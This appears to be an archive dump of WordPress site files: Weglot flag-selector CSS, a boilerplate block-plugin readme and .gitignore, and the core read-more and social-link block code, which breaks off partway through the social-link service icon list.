0!important}.weglot-flags.flag-3.ps>a:before,.weglot-flags.flag-3.ps>span:before{background-position:-4753px 0!important}.weglot-flags.flag-3.fa>a:before,.weglot-flags.flag-3.fa>span:before{background-position:-816px 0!important}.weglot-flags.flag-3.pl>a:before,.weglot-flags.flag-3.pl>span:before{background-position:-4944px 0!important}.weglot-flags.flag-3.pt>a:before,.weglot-flags.flag-3.pt>span:before{background-position:-3504px 0!important}.weglot-flags.flag-3.pa>a:before,.weglot-flags.flag-3.pa>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.ro>a:before,.weglot-flags.flag-3.ro>span:before{background-position:-3744px 0!important}.weglot-flags.flag-3.ru>a:before,.weglot-flags.flag-3.ru>span:before{background-position:-2664px 0!important}.weglot-flags.flag-3.sm>a:before,.weglot-flags.flag-3.sm>span:before{background-position:-1248px 0!important}.weglot-flags.flag-3.gd>a:before,.weglot-flags.flag-3.gd>span:before{background-position:-3841px 0!important}.weglot-flags.flag-3.sr>a:before,.weglot-flags.flag-3.sr>span:before{background-position:-3312px 0!important}.weglot-flags.flag-3.sn>a:before,.weglot-flags.flag-3.sn>span:before{background-position:-5521px 0!important}.weglot-flags.flag-3.sd>a:before,.weglot-flags.flag-3.sd>span:before{background-position:-1993px 0!important}.weglot-flags.flag-3.si>a:before,.weglot-flags.flag-3.si>span:before{background-position:-2833px 0!important}.weglot-flags.flag-3.sk>a:before,.weglot-flags.flag-3.sk>span:before{background-position:-552px 0!important}.weglot-flags.flag-3.sl>a:before,.weglot-flags.flag-3.sl>span:before{background-position:-936px 0!important}.weglot-flags.flag-3.so>a:before,.weglot-flags.flag-3.so>span:before{background-position:-4032px 0!important}.weglot-flags.flag-3.st>a:before,.weglot-flags.flag-3.st>span:before{background-position:-3961px 0!important}.weglot-flags.flag-3.es>a:before,.weglot-flags.flag-3.es>span:before{background-position:-3576px 0!important}.weglot-flags.flag-3.su>a:before,.weglot-flags.flag-3.su>span:before{background-position:-3985px 0!important}.weglot-flags.flag-3.sw>a:before,.weglot-flags.flag-3.sw>span:before{background-position:-912px 0!important}.weglot-flags.flag-3.sv>a:before,.weglot-flags.flag-3.sv>span:before{background-position:-264px 0!important}.weglot-flags.flag-3.tl>a:before,.weglot-flags.flag-3.tl>span:before{background-position:-5232px 0!important}.weglot-flags.flag-3.ty>a:before,.weglot-flags.flag-3.ty>span:before{background-position:-1512px 0!important}.weglot-flags.flag-3.tg>a:before,.weglot-flags.flag-3.tg>span:before{background-position:-3720px 0!important}.weglot-flags.flag-3.ta>a:before,.weglot-flags.flag-3.ta>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.tt>a:before,.weglot-flags.flag-3.tt>span:before{background-position:-2664px 0!important}.weglot-flags.flag-3.te>a:before,.weglot-flags.flag-3.te>span:before{background-position:-2304px 0!important}.weglot-flags.flag-3.th>a:before,.weglot-flags.flag-3.th>span:before{background-position:-4848px 0!important}.weglot-flags.flag-3.to>a:before,.weglot-flags.flag-3.to>span:before{background-position:-1680px 0!important}.weglot-flags.flag-3.tr>a:before,.weglot-flags.flag-3.tr>span:before{background-position:-432px 0!important}.weglot-flags.flag-3.uk>a:before,.weglot-flags.flag-3.uk>span:before{background-position:-5736px 0!important}.weglot-flags.flag-3.ur>a:before,.weglot-flags.flag-3.ur>span:before{background-position:-1992px 0!important}.weglot-flags.flag-3.uz>a:before,.weglot-flags.flag-3.uz>span:before{background-position:-2160px 0!important}.weglot-flags.flag-3.vi>a:before,.weglot-flags.flag-3.vi>span:before{background-position:-3384px 0!important}.weglot-flags.flag-3.cy>a:before,.weglot-flags.flag-3.cy>span:before{background-position:-5040px 0!important}.weglot-flags.flag-3.fy>a:before,.weglot-flags.flag-3.fy>span:before{background-position:-3360px 0!important}.weglot-flags.flag-3.xh>a:before,.weglot-flags.flag-3.xh>span:before{background-position:-5496px 0!important}.weglot-flags.flag-3.yi>a:before,.weglot-flags.flag-3.yi>span:before{background-position:-1608px 0!important}.weglot-flags.flag-3.yo>a:before,.weglot-flags.flag-3.yo>span:before{background-position:-3457px 0!important}.weglot-flags.flag-3.zu>a:before,.weglot-flags.flag-3.zu>span:before{background-position:-5496px 0!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags a.mega-menu-link:before{background-image:url(images/rect_mate.b41fa0fe.png)!important;background-size:auto 20px!important;border-radius:0!important;content:"";display:inline-block;height:20px!important;margin-right:10px;overflow:hidden;vertical-align:middle;width:30px!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-1 .mega-menu-link:before{background-image:url(images/rect_bright.93dd8032.png)!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-2 .mega-menu-link:before{background-image:url(images/square_flag.32ea47ac.png)!important;background-size:auto 24px!important;height:24px!important;width:24px!important}body div[id^=mega-menu-wrap] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-3 .mega-menu-link:before{background-image:url(images/circular_flag.2a0fa173.png)!important;background-size:auto 24px!important;height:24px!important;width:24px!important}#wp-admin-bar-weglot>.ab-item{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMDAiIGhlaWdodD0iMzAwIj48ZyBmaWxsPSIjYTBhNWFhIj48cGF0aCBkPSJtMjEuNzM5IDkyLjU2NSA1MS44MjggMTI5LjczMiAyMy42Ni02MC4yNzkgMjQuMTQ0IDYwLjI3OUwxNzMuMiA5Mi41NjVoLTI4LjAwN2wtMjMuODIyIDU4Ljc1LTIzLjkwMi01OC43NS0yMy45MDIgNTguNzUtMjMuOTAyLTU4Ljc1SDIxLjczOXoiLz48cGF0aCBkPSJNMjEwLjAwNiA5Mi43MWMtMTcuODY2IDAtMzMuMTU3IDYuMzU4LTQ1Ljg3MyAxOS4wNzQtMTIuNzE1IDEyLjcxNi0xOC45OTMgMjguMDA2LTE4Ljk5MyA0NS43OTIgMCAxNy44NjcgNi4yNzggMzMuMTU4IDE4Ljk5MyA0NS44NzMgMTIuNzE2IDEyLjcxNiAyOC4wMDcgMTguOTkzIDQ1Ljg3MyAxOC45OTMgMTcuNzg2IDAgMzMuMDc3LTYuMjc3IDQ1Ljc5My0xOC45OTMgMTIuNzE1LTEyLjcxNSAxOS4wNzMtMjguMDA2IDE5LjA3My00NS44NzMgMC00LjUwNy0uNDgzLTguODUyLTEuMjg4LTEyLjk1N2gtNjMuNTc4djI1LjkxNGgzNi42OTljLTIuNzM3IDcuNTY1LTcuNDg1IDEzLjg0My0xNC4wODQgMTguNjcxLTYuNjggNC44My0xNC4yNDUgNy4yNDQtMjIuNjE1IDcuMjQ0LTEwLjc4NCAwLTE5Ljk1OC0zLjc4My0yNy41MjMtMTEuMzQ4LTcuNTY2LTcuNTY1LTExLjM0OC0xNi43NC0xMS4zNDgtMjcuNTI0IDAtMTAuNjIzIDMuNzgyLTE5Ljc5OCAxMS4zNDgtMjcuNDQzIDcuNTY1LTcuNjQ1IDE2Ljc0LTExLjUwOCAyNy41MjMtMTEuNTA4IDEwLjYyMyAwIDE5Ljc5OCAzLjg2MyAyNy41MjQgMTEuNDI4bDE4LjM1LTE4LjM1YTY3Ljk2MyA2Ny45NjMgMCAwIDAtMjAuNzY0LTEzLjg0MmMtNy44ODctMy4zOC0xNi4yNTctNS4xNS0yNS4xMS01LjE1eiIvPjwvZz48L3N2Zz4=)!important;background-position:4px 5px!important;background-repeat:no-repeat!important;background-size:22px auto!important;padding-left:30px!important}.weglot-hide,li.weglot-hide{display:none!important}.country-selector{display:inline-block;position:relative;text-align:left;width:auto;z-index:9999}.country-selector a{-webkit-touch-callout:none;color:#000;cursor:pointer;float:none!important;font-weight:400;outline:none;padding:0 10px;text-decoration:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;white-space:nowrap}.country-selector a:focus{outline:none}.country-selector ul{list-style:none;margin:0;padding:0;z-index:1010}.country-selector li{margin:0;padding:0}.country-selector.weglot-dropdown{background-color:#fff}.country-selector.weglot-dropdown a,.country-selector.weglot-dropdown span{box-sizing:border-box;display:block;font-size:13px;font-weight:400;height:37px;line-height:36px;padding:0 10px;width:100%}.country-selector.weglot-dropdown a:hover,.country-selector.weglot-dropdown span:hover{cursor:pointer}.country-selector.weglot-dropdown .wgcurrent{border:1px solid #e0e0e0;display:block;list-style:none;margin:0}.country-selector.weglot-dropdown .wgcurrent a,.country-selector.weglot-dropdown .wgcurrent span{padding-right:60px}.country-selector.weglot-dropdown .wgcurrent:after{-ms-interpolation-mode:nearest-neighbor;background:url(images/wgarrowdown.517eb92e.png) no-repeat;content:"";display:inline-block;height:7px;image-rendering:-moz-crisp-edges;image-rendering:-webkit-optimize-contrast;image-rendering:-o-pixelated;image-rendering:pixelated;position:absolute;right:8px;top:17px;transform:rotate(-90deg);transition:all .2s;width:13px}.country-selector.weglot-dropdown ul{background:#fff;border:1px solid #ebeef0;box-sizing:border-box;display:none;left:0;min-width:100%;padding:0;position:absolute;top:auto}.country-selector.weglot-dropdown input:checked~ul{display:block}.country-selector.weglot-dropdown input:checked~.wgcurrent:after{transform:rotate(0deg)}.country-selector.weglot-dropdown li{width:100%}.country-selector.weglot-dropdown.weglot-invert ul{bottom:38px}.country-selector.weglot-dropdown.weglot-invert input:checked~.wgcurrent:after{transform:rotate(-180deg)}.country-selector.weglot-default{bottom:0;position:fixed;right:40px}.country-selector.weglot-inline a:hover{color:#00a0d2;text-decoration:underline}.country-selector.weglot-inline .wgcurrent a{text-decoration:underline}.country-selector.weglot-inline label{margin-bottom:0}.country-selector.weglot-inline label,.country-selector.weglot-inline li,.country-selector.weglot-inline ul{display:inline-block;vertical-align:middle}.country-selector.weglot-inline li{line-height:1!important;margin:2px 0}.country-selector.weglot-inline.weglot-default{bottom:5px}.country-selector input{display:none!important}.navbar .navbar-nav li.weglot-flags a.weglot-lang:before{position:static;transform:none;transition:none}.js .main-navigation .country-selector ul{display:none}html[dir=rtl] .weglot-flags a:before,html[dir=rtl] .weglot-flags span:before{margin-left:10px;margin-right:0}.weglot-flags>a:before,.weglot-flags>span.wglanguage-name:before{background-image:url(images/rect_mate.b41fa0fe.png);background-size:auto 20px!important;border-radius:0!important;content:"";display:inline-block;height:20px!important;margin-right:10px;overflow:hidden;vertical-align:middle;width:30px!important}.weglot-flags.flag-1>a:before,.weglot-flags.flag-1>span:before{background-image:url(images/rect_bright.93dd8032.png)}.weglot-flags.flag-2>a:before,.weglot-flags.flag-2>span:before{background-image:url(images/square_flag.32ea47ac.png);background-size:auto 24px!important;height:24px!important;width:24px!important}.weglot-flags.flag-3 a:before,.weglot-flags.flag-3 span:before{background-image:url(images/circular_flag.2a0fa173.png);background-size:auto 24px!important;height:24px!important;width:24px!important}.weglot-flags>a span:before,.weglot-flags>span a:before{background-image:none!important;display:none!important}
weglot-widget/readme.txt000064400000003504151330373270011332 0ustar00=== Weglot Widget ===
Contributors:      The WordPress Contributors
Tags:              block
Tested up to:      5.9
Stable tag:        0.1.0
License:           GPL-2.0-or-later
License URI:       https://www.gnu.org/licenses/gpl-2.0.html

Example block written with ESNext standard and JSX support – build step required.

== Description ==

This is the long description. No limit, and you can use Markdown (as well as in the following sections).

For backwards compatibility, if this section is missing, the full length of the short description will be used, and
Markdown parsed.

== Installation ==

This section describes how to install the plugin and get it working.

e.g.

1. Upload the plugin files to the `/wp-content/plugins/weglot-widget` directory, or install the plugin through the WordPress plugins screen directly.
1. Activate the plugin through the 'Plugins' screen in WordPress


== Frequently Asked Questions ==

= A question that someone might have =

An answer to that question.

= What about foo bar? =

Answer to foo bar dilemma.

== Screenshots ==

1. This screen shot description corresponds to screenshot-1.(png|jpg|jpeg|gif). Note that the screenshot is taken from
the /assets directory or the directory that contains the stable readme.txt (tags or trunk). Screenshots in the /assets
directory take precedence. For example, `/assets/screenshot-1.png` would win over `/tags/4.3/screenshot-1.png`
(or jpg, jpeg, gif).
2. This is the second screen shot

== Changelog ==

= 0.1.0 =
* Release

== Arbitrary section ==

You may provide arbitrary sections, in the same format as the ones above. This may be of use for extremely complicated
plugins where more information needs to be conveyed that doesn't fit into the categories of "description" or
"installation." Arbitrary sections will be shown below the built-in sections outlined above.
weglot-widget/.gitignore000064400000000657151330373270011332 0ustar00# Logs
logs
*.log
npm-debug.log*
yarn-debug.log*
yarn-error.log*

# Coverage directory used by tools like istanbul
coverage

# Compiled binary addons (https://nodejs.org/api/addons.html)
build/Release

# Dependency directories
node_modules/

# Optional npm cache directory
.npm

# Optional eslint cache
.eslintcache

# Output of `npm pack`
*.tgz

# Output of `wp-scripts plugin-zip`
*.zip

# dotenv environment variables file
.env
read-more/style.css000060400000000507151330427370010274 0ustar00.wp-block-read-more{
  display:block;
  width:-moz-fit-content;
  width:fit-content;
}
.wp-block-read-more:where(:not([style*=text-decoration])){
  text-decoration:none;
}
.wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{
  text-decoration:none;
}read-more/style.min.css000060400000000460151330427370011054 0ustar00.wp-block-read-more{display:block;width:-moz-fit-content;width:fit-content}.wp-block-read-more:where(:not([style*=text-decoration])){text-decoration:none}.wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{text-decoration:none}read-more/style-rtl.css000060400000000507151330427370011073 0ustar00.wp-block-read-more{
  display:block;
  width:-moz-fit-content;
  width:fit-content;
}
.wp-block-read-more:where(:not([style*=text-decoration])){
  text-decoration:none;
}
.wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{
  text-decoration:none;
}read-more/style-rtl.min.css000060400000000460151330427370011653 0ustar00.wp-block-read-more{display:block;width:-moz-fit-content;width:fit-content}.wp-block-read-more:where(:not([style*=text-decoration])){text-decoration:none}.wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{text-decoration:none}read-more/block.json000060400000002360151330427370010406 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/read-more",
	"title": "Read More",
	"category": "theme",
	"description": "Displays the link of a post, page, or any other content-type.",
	"textdomain": "default",
	"attributes": {
		"content": {
			"type": "string"
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		}
	},
	"usesContext": [ "postId" ],
	"supports": {
		"html": false,
		"color": {
			"gradients": true,
			"text": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextDecoration": true,
			"__experimentalDefaultControls": {
				"fontSize": true,
				"textDecoration": true
			}
		},
		"spacing": {
			"margin": [ "top", "bottom" ],
			"padding": true,
			"__experimentalDefaultControls": {
				"padding": true
			}
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"width": true,
			"__experimentalDefaultControls": {
				"width": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-read-more"
}
read-more.php000060400000003446151330427370007140 0ustar00<?php
/**
 * Server-side rendering of the `core/read-more` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/read-more` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string  Returns the post link.
 */
function render_block_core_read_more( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) ) {
		return '';
	}

	$post_ID    = $block->context['postId'];
	$post_title = get_the_title( $post_ID );
	if ( '' === $post_title ) {
		$post_title = sprintf(
			/* translators: %s is post ID to describe the link for screen readers. */
			__( 'untitled post %s' ),
			$post_ID
		);
	}
	$screen_reader_text = sprintf(
		/* translators: %s is either the post title or post ID to describe the link for screen readers. */
		__( ': %s' ),
		$post_title
	);
	$justify_class_name = empty( $attributes['justifyContent'] ) ? '' : "is-justified-{$attributes['justifyContent']}";
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $justify_class_name ) );
	$more_text          = ! empty( $attributes['content'] ) ? wp_kses_post( $attributes['content'] ) : __( 'Read more' );
	return sprintf(
		'<a %1s href="%2s" target="%3s">%4s<span class="screen-reader-text">%5s</span></a>',
		$wrapper_attributes,
		get_the_permalink( $post_ID ),
		esc_attr( $attributes['linkTarget'] ),
		$more_text,
		$screen_reader_text
	);
}

/**
 * Registers the `core/read-more` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_read_more() {
	register_block_type_from_metadata(
		__DIR__ . '/read-more',
		array(
			'render_callback' => 'render_block_core_read_more',
		)
	);
}
add_action( 'init', 'register_block_core_read_more' );
social-link.php000060400000175253151330427370007500 0ustar00<?php
/**
 * Server-side rendering of the `core/social-link` blocks.
 *
 * @package WordPress
 */

/**
 * Renders the `core/social-link` block on server.
 *
 * @since 5.4.0
 *
 * @param Array    $attributes The block attributes.
 * @param String   $content    InnerBlocks content of the Block.
 * @param WP_Block $block      Block object.
 *
 * @return string Rendered HTML of the referenced block.
 */
function render_block_core_social_link( $attributes, $content, $block ) {
	$open_in_new_tab = isset( $block->context['openInNewTab'] ) ? $block->context['openInNewTab'] : false;

	$text = ! empty( $attributes['label'] ) ? trim( $attributes['label'] ) : '';

	$service     = isset( $attributes['service'] ) ? $attributes['service'] : 'Icon';
	$url         = isset( $attributes['url'] ) ? $attributes['url'] : false;
	$text        = $text ? $text : block_core_social_link_get_name( $service );
	$rel         = isset( $attributes['rel'] ) ? $attributes['rel'] : '';
	$show_labels = array_key_exists( 'showLabels', $block->context ) ? $block->context['showLabels'] : false;

	// Don't render a link if there is no URL set.
	if ( ! $url ) {
		return '';
	}

	/**
	 * Prepend emails with `mailto:` if not set.
	 * The `is_email` returns false for emails with schema.
	 */
	if ( is_email( $url ) ) {
		$url = 'mailto:' . antispambot( $url );
	}

	/**
	 * Prepend URL with https:// if it doesn't appear to contain a scheme
	 * and it's not a relative link starting with //.
	 */
	if ( ! parse_url( $url, PHP_URL_SCHEME ) && ! str_starts_with( $url, '//' ) ) {
		$url = 'https://' . $url;
	}

	$icon               = block_core_social_link_get_icon( $service );
	$wrapper_attributes = get_block_wrapper_attributes(
		array(
			'class' => 'wp-social-link wp-social-link-' . $service . block_core_social_link_get_color_classes( $block->context ),
			'style' => block_core_social_link_get_color_styles( $block->context ),
		)
	);

	$link  = '<li ' . $wrapper_attributes . '>';
	$link .= '<a href="' . esc_url( $url ) . '" class="wp-block-social-link-anchor">';
	$link .= $icon;
	$link .= '<span class="wp-block-social-link-label' . ( $show_labels ? '' : ' screen-reader-text' ) . '">' . esc_html( $text ) . '</span>';
	$link .= '</a></li>';

	$processor = new WP_HTML_Tag_Processor( $link );
	$processor->next_tag( 'a' );
	if ( $open_in_new_tab ) {
		$processor->set_attribute( 'rel', trim( $rel . ' noopener nofollow' ) );
		$processor->set_attribute( 'target', '_blank' );
	} elseif ( '' !== $rel ) {
		$processor->set_attribute( 'rel', trim( $rel ) );
	}
	return $processor->get_updated_html();
}

/**
 * Registers the `core/social-link` blocks.
 *
 * @since 5.4.0
 */
function register_block_core_social_link() {
	register_block_type_from_metadata(
		__DIR__ . '/social-link',
		array(
			'render_callback' => 'render_block_core_social_link',
		)
	);
}
add_action( 'init', 'register_block_core_social_link' );


/**
 * Returns the SVG for social link.
 *
 * @since 5.4.0
 *
 * @param string $service The service icon.
 *
 * @return string SVG Element for service icon.
 */
function block_core_social_link_get_icon( $service ) {
	$services = block_core_social_link_services();
	if ( isset( $services[ $service ] ) && isset( $services[ $service ]['icon'] ) ) {
		return $services[ $service ]['icon'];
	}

	return $services['share']['icon'];
}

/**
 * Returns the brand name for social link.
 *
 * @since 5.4.0
 *
 * @param string $service The service icon.
 *
 * @return string Brand label.
 */
function block_core_social_link_get_name( $service ) {
	$services = block_core_social_link_services();
	if ( isset( $services[ $service ] ) && isset( $services[ $service ]['name'] ) ) {
		return $services[ $service ]['name'];
	}

	return $services['share']['name'];
}

/**
 * Returns the SVG for social link.
 *
 * @since 5.4.0
 *
 * @param string $service The service slug to extract data from.
 * @param string $field The field ('name', 'icon', etc) to extract for a service.
 *
 * @return array|string
 */
function block_core_social_link_services( $service = '', $field = '' ) {
	$services_data = array(
		'fivehundredpx' => array(
			'name' => '500px',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M6.94026,15.1412c.00437.01213.108.29862.168.44064a6.55008,6.55008,0,1,0,6.03191-9.09557,6.68654,6.68654,0,0,0-2.58357.51467A8.53914,8.53914,0,0,0,8.21268,8.61344L8.209,8.61725V3.22948l9.0504-.00008c.32934-.0036.32934-.46353.32934-.61466s0-.61091-.33035-.61467L7.47248,2a.43.43,0,0,0-.43131.42692v7.58355c0,.24466.30476.42131.58793.4819.553.11812.68074-.05864.81617-.2457l.018-.02481A10.52673,10.52673,0,0,1,9.32258,9.258a5.35268,5.35268,0,1,1,7.58985,7.54976,5.417,5.417,0,0,1-3.80867,1.56365,5.17483,5.17483,0,0,1-2.69822-.74478l.00342-4.61111a2.79372,2.79372,0,0,1,.71372-1.78792,2.61611,2.61611,0,0,1,1.98282-.89477,2.75683,2.75683,0,0,1,1.95525.79477,2.66867,2.66867,0,0,1,.79656,1.909,2.724,2.724,0,0,1-2.75849,2.748,4.94651,4.94651,0,0,1-.86254-.13719c-.31234-.093-.44519.34058-.48892.48349-.16811.54966.08453.65862.13687.67489a3.75751,3.75751,0,0,0,1.25234.18375,3.94634,3.94634,0,1,0-2.82444-6.742,3.67478,3.67478,0,0,0-1.13028,2.584l-.00041.02323c-.0035.11667-.00579,2.881-.00644,3.78811l-.00407-.00451a6.18521,6.18521,0,0,1-1.0851-1.86092c-.10544-.27856-.34358-.22925-.66857-.12917-.14192.04372-.57386.17677-.47833.489Zm4.65165-1.08338a.51346.51346,0,0,0,.19513.31818l.02276.022a.52945.52945,0,0,0,.3517.18416.24242.24242,0,0,0,.16577-.0611c.05473-.05082.67382-.67812.73287-.738l.69041.68819a.28978.28978,0,0,0,.21437.11032.53239.53239,0,0,0,.35708-.19486c.29792-.30419.14885-.46821.07676-.54751l-.69954-.69975.72952-.73469c.16-.17311.01874-.35708-.12218-.498-.20461-.20461-.402-.25742-.52855-.14083l-.7254.72665-.73354-.73375a.20128.20128,0,0,0-.14179-.05695.54135.54135,0,0,0-.34379.19648c-.22561.22555-.274.38149-.15656.5059l.73374.7315-.72942.73072A.26589.26589,0,0,0,11.59191,14.05782Zm1.59866-9.915A8.86081,8.86081,0,0,0,9.854,4.776a.26169.26169,0,0,0-.16938.22759.92978.92978,0,0,0,.08619.42094c.05682.14524.20779.531.50006.41955a8.40969,8.40969,0,0,1,2.91968-.55484,7.87875,7.87875,0,0,1,3.086.62286,8.61817,8.61817,0,0,1,2.30562,1.49315.2781.2781,0,0,0,.18318.07586c.15529,0,.30425-.15253.43167-.29551.21268-.23861.35873-.4369.1492-.63538a8.50425,8.50425,0,0,0-2.62312-1.694A9.0177,9.0177,0,0,0,13.19058,4.14283ZM19.50945,18.6236h0a.93171.93171,0,0,0-.36642-.25406.26589.26589,0,0,0-.27613.06613l-.06943.06929A7.90606,7.90606,0,0,1,7.60639,18.505a7.57284,7.57284,0,0,1-1.696-2.51537,8.58715,8.58715,0,0,1-.5147-1.77754l-.00871-.04864c-.04939-.25873-.28755-.27684-.62981-.22448-.14234.02178-.5755.088-.53426.39969l.001.00712a9.08807,9.08807,0,0,0,15.406,4.99094c.00193-.00192.04753-.04718.0725-.07436C19.79425,19.16234,19.87422,18.98728,19.50945,18.6236Z"></path></svg>',
		),
		'amazon'        => array(
			'name' => 'Amazon',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M13.582,8.182C11.934,8.367,9.78,8.49,8.238,9.166c-1.781,0.769-3.03,2.337-3.03,4.644 c0,2.953,1.86,4.429,4.253,4.429c2.02,0,3.125-0.477,4.685-2.065c0.516,0.747,0.685,1.109,1.629,1.894 c0.212,0.114,0.483,0.103,0.672-0.066l0.006,0.006c0.567-0.505,1.599-1.401,2.18-1.888c0.231-0.188,0.19-0.496,0.009-0.754 c-0.52-0.718-1.072-1.303-1.072-2.634V8.305c0-1.876,0.133-3.599-1.249-4.891C15.23,2.369,13.422,2,12.04,2 C9.336,2,6.318,3.01,5.686,6.351C5.618,6.706,5.877,6.893,6.109,6.945l2.754,0.298C9.121,7.23,9.308,6.977,9.357,6.72 c0.236-1.151,1.2-1.706,2.284-1.706c0.584,0,1.249,0.215,1.595,0.738c0.398,0.584,0.346,1.384,0.346,2.061V8.182z M13.049,14.088 c-0.451,0.8-1.169,1.291-1.967,1.291c-1.09,0-1.728-0.83-1.728-2.061c0-2.42,2.171-2.86,4.227-2.86v0.615 C13.582,12.181,13.608,13.104,13.049,14.088z M20.683,19.339C18.329,21.076,14.917,22,11.979,22c-4.118,0-7.826-1.522-10.632-4.057 c-0.22-0.199-0.024-0.471,0.241-0.317c3.027,1.762,6.771,2.823,10.639,2.823c2.608,0,5.476-0.541,8.115-1.66 C20.739,18.62,21.072,19.051,20.683,19.339z M21.336,21.043c-0.194,0.163-0.379,0.076-0.293-0.139 c0.284-0.71,0.92-2.298,0.619-2.684c-0.301-0.386-1.99-0.183-2.749-0.092c-0.23,0.027-0.266-0.173-0.059-0.319 c1.348-0.946,3.555-0.673,3.811-0.356C22.925,17.773,22.599,19.986,21.336,21.043z"></path></svg>',
		),
		'bandcamp'      => array(
			'name' => 'Bandcamp',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M15.27 17.289 3 17.289 8.73 6.711 21 6.711 15.27 17.289"></path></svg>',
		),
		'behance'       => array(
			'name' => 'Behance',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M7.799,5.698c0.589,0,1.12,0.051,1.606,0.156c0.482,0.102,0.894,0.273,1.241,0.507c0.344,0.235,0.612,0.546,0.804,0.938 c0.188,0.387,0.281,0.871,0.281,1.443c0,0.619-0.141,1.137-0.421,1.551c-0.284,0.413-0.7,0.751-1.255,1.014 c0.756,0.218,1.317,0.601,1.689,1.146c0.374,0.549,0.557,1.205,0.557,1.975c0,0.623-0.12,1.161-0.359,1.612 c-0.241,0.457-0.569,0.828-0.973,1.114c-0.408,0.288-0.876,0.5-1.399,0.637C9.052,17.931,8.514,18,7.963,18H2V5.698H7.799 M7.449,10.668c0.481,0,0.878-0.114,1.192-0.345c0.311-0.228,0.463-0.603,0.463-1.119c0-0.286-0.051-0.523-0.152-0.707 C8.848,8.315,8.711,8.171,8.536,8.07C8.362,7.966,8.166,7.894,7.94,7.854c-0.224-0.044-0.457-0.06-0.697-0.06H4.709v2.874H7.449z M7.6,15.905c0.267,0,0.521-0.024,0.759-0.077c0.243-0.053,0.457-0.137,0.637-0.261c0.182-0.12,0.332-0.283,0.441-0.491 C9.547,14.87,9.6,14.602,9.6,14.278c0-0.633-0.18-1.084-0.533-1.357c-0.356-0.27-0.83-0.404-1.413-0.404H4.709v3.388L7.6,15.905z M16.162,15.864c0.367,0.358,0.897,0.538,1.583,0.538c0.493,0,0.92-0.125,1.277-0.374c0.354-0.248,0.571-0.514,0.654-0.79h2.155 c-0.347,1.072-0.872,1.838-1.589,2.299C19.534,18,18.67,18.23,17.662,18.23c-0.701,0-1.332-0.113-1.899-0.337 c-0.567-0.227-1.041-0.544-1.439-0.958c-0.389-0.415-0.689-0.907-0.904-1.484c-0.213-0.574-0.32-1.21-0.32-1.899 c0-0.666,0.11-1.288,0.329-1.863c0.222-0.577,0.529-1.075,0.933-1.492c0.406-0.42,0.885-0.751,1.444-0.994 c0.558-0.241,1.175-0.363,1.857-0.363c0.754,0,1.414,0.145,1.98,0.44c0.563,0.291,1.026,0.686,1.389,1.181 c0.363,0.493,0.622,1.057,0.783,1.69c0.16,0.632,0.217,1.292,0.171,1.983h-6.428C15.557,14.84,15.795,15.506,16.162,15.864 M18.973,11.184c-0.291-0.321-0.783-0.496-1.384-0.496c-0.39,0-0.714,0.066-0.973,0.2c-0.254,0.132-0.461,0.297-0.621,0.491 c-0.157,0.197-0.265,0.405-0.328,0.628c-0.063,0.217-0.101,0.413-0.111,0.587h3.98C19.478,11.969,19.265,11.509,18.973,11.184z M15.057,7.738h4.985V6.524h-4.985L15.057,7.738z"></path></svg>',
		),
		'bluesky'       => array(
			'name' => 'Bluesky',
			'icon' => '<svg width="24" height="24" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false"><path d="M6.3,4.2c2.3,1.7,4.8,5.3,5.7,7.2.9-1.9,3.4-5.4,5.7-7.2,1.7-1.3,4.3-2.2,4.3.9s-.4,5.2-.6,5.9c-.7,2.6-3.3,3.2-5.6,2.8,4,.7,5.1,3,2.9,5.3-5,5.2-6.7-2.8-6.7-2.8,0,0-1.7,8-6.7,2.8-2.2-2.3-1.2-4.6,2.9-5.3-2.3.4-4.9-.3-5.6-2.8-.2-.7-.6-5.3-.6-5.9,0-3.1,2.7-2.1,4.3-.9h0Z"></path></svg>',
		),
		'chain'         => array(
			'name' => 'Link',
